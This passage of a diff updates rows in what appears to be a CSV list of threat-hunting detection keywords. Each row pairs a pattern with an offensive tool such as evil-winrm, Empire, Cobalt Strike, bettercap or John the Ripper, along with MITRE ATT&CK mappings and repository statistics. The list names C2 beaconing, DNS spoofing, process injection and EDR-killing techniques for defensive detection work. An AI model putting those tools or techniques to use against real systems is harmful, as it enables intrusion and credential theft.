Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.","T1021.006 - T1059.001 - T1059.003 - T1047","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/Hackplayers/evil-winrm","1","0","N/A","10","10","3763","566","2023-06-09T07:42:42Z","2019-05-28T10:53:00Z" +"*Dll-Loader -local -path*","offensive_tool_keyword","evil-winrm","This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.","T1021.006 - T1059.001 - T1059.003 - T1047","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/Hackplayers/evil-winrm","1","0","N/A","10","10","3763","566","2023-06-09T07:42:42Z","2019-05-28T10:53:00Z" +"*Dll-Loader -smb -path *","offensive_tool_keyword","evil-winrm","This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.","T1021.006 - T1059.001 - T1059.003 - T1047","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/Hackplayers/evil-winrm","1","0","N/A","10","10","3763","566","2023-06-09T07:42:42Z","2019-05-28T10:53:00Z" "*DllLoaderLoader.exe*","offensive_tool_keyword","Ebowla","Framework for Making Environmental Keyed Payloads","T1027.002 - T1059.003 - T1140","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Genetic-Malware/Ebowla","1","1","N/A","10","8","710","179","2019-01-28T10:45:15Z","2016-04-07T22:29:58Z" -"*-DllName *-Module *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*-DllName *-Module *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*DllNotificationInjection.cpp*","offensive_tool_keyword","DllNotificationInjection","A POC of a new threadless process injection technique that works by utilizing the concept of DLL Notification Callbacks in local and remote processes.","T1055.011 - T1055.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/ShorSec/DllNotificationInjection","1","1","N/A","10","4","319","56","2023-08-23T13:50:27Z","2023-08-14T11:22:30Z" "*DllNotificationInjection.exe*","offensive_tool_keyword","DllNotificationInjection","A POC of a new threadless process injection technique that works by utilizing the concept of DLL Notification Callbacks in local and remote processes.","T1055.011 - T1055.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/ShorSec/DllNotificationInjection","1","1","N/A","10","4","319","56","2023-08-23T13:50:27Z","2023-08-14T11:22:30Z" "*DllNotificationInjection.sln*","offensive_tool_keyword","DllNotificationInjection","A POC of a new threadless process injection technique that works by utilizing the concept of DLL Notification Callbacks in local and remote processes.","T1055.011 - T1055.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/ShorSec/DllNotificationInjection","1","1","N/A","10","4","319","56","2023-08-23T13:50:27Z","2023-08-14T11:22:30Z" @@ -9393,46 +9541,46 @@ "*DllNotificationInjection-master*","offensive_tool_keyword","DllNotificationInjection","A POC of a new threadless process injection technique that works by utilizing the concept of DLL Notification Callbacks in local and remote processes.","T1055.011 - T1055.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/ShorSec/DllNotificationInjection","1","1","N/A","10","4","319","56","2023-08-23T13:50:27Z","2023-08-14T11:22:30Z" "*dllproxy.py*","offensive_tool_keyword","DllProxy","Proxy your dll exports and add some spicy content at the same time","T1574.002 - T1036.005","TA0005 - TA0004","N/A","N/A","Exploitation Tools","https://github.com/Iansus/DllProxy/","1","1","N/A","N/A","1","16","5","2023-06-28T14:19:36Z","2021-05-04T19:38:42Z" "*DllProxy-main*","offensive_tool_keyword","DllProxy","Proxy your dll exports and add some spicy content at the same time","T1574.002 - T1036.005","TA0005 - TA0004","N/A","N/A","Exploitation Tools","https://github.com/Iansus/DllProxy/","1","1","N/A","N/A","1","16","5","2023-06-28T14:19:36Z","2021-05-04T19:38:42Z" -"*dllsearcher *.dll*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*dllsearcher *.dll*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" "*dmcxblue/SharpBlackout*","offensive_tool_keyword","SharpBlackout","Terminate AV/EDR leveraging BYOVD attack","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/dmcxblue/SharpBlackout","1","1","N/A","10","1","68","16","2023-08-23T14:44:25Z","2023-08-23T14:16:40Z" "*dmFsaWRfdXNlckBjb250b3NvLmNvbTpQYXNzd29yZDE*","offensive_tool_keyword","o365enum","Enumerate valid usernames from Office 365 using ActiveSync - Autodiscover v1 or office.com login page.","T1595 - T1595.002 - T1114 - T1114.001 - T1087 - T1087.002","TA0040 - TA0010 - TA0007","N/A","N/A","Exploitation tools","https://github.com/gremwell/o365enum","1","0","N/A","7","3","212","40","2021-04-23T14:40:52Z","2020-02-18T12:22:50Z" -"*dmg2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*dmg2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*DNet-EnumerateAllDomainUserAccounts*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*DNet-ListAccountsByDescription*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*DNet-ListDomainUserAccountsWithCompletedADDescription*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*DNet-ListUsersInDomainAdminsGroup*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*dnf install tor -y*","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","torproject.org","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*dns.spoof on*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","0","N/A","N/A","10","14623","1372","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" -"*dns.spoof.address*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14623","1372","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" -"*dns.spoof.all*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14623","1372","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" -"*dns.spoof.domains*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14623","1372","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" -"*dns.spoof.hosts*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14623","1372","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" -"*dns_beacon_beacon*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","544","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" -"*dns_beacon_dns_idle*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","544","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" -"*dns_beacon_dns_sleep*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","544","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" -"*dns_beacon_dns_stager_prepend*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","544","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" -"*dns_beacon_dns_stager_subhost*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","544","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" -"*dns_beacon_dns_ttl*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","544","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" -"*dns_beacon_get_A*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","544","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" -"*dns_beacon_get_TXT*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","544","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" -"*dns_beacon_maxdns*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","544","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" -"*dns_beacon_ns_response*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","544","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" -"*dns_beacon_put_metadata*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 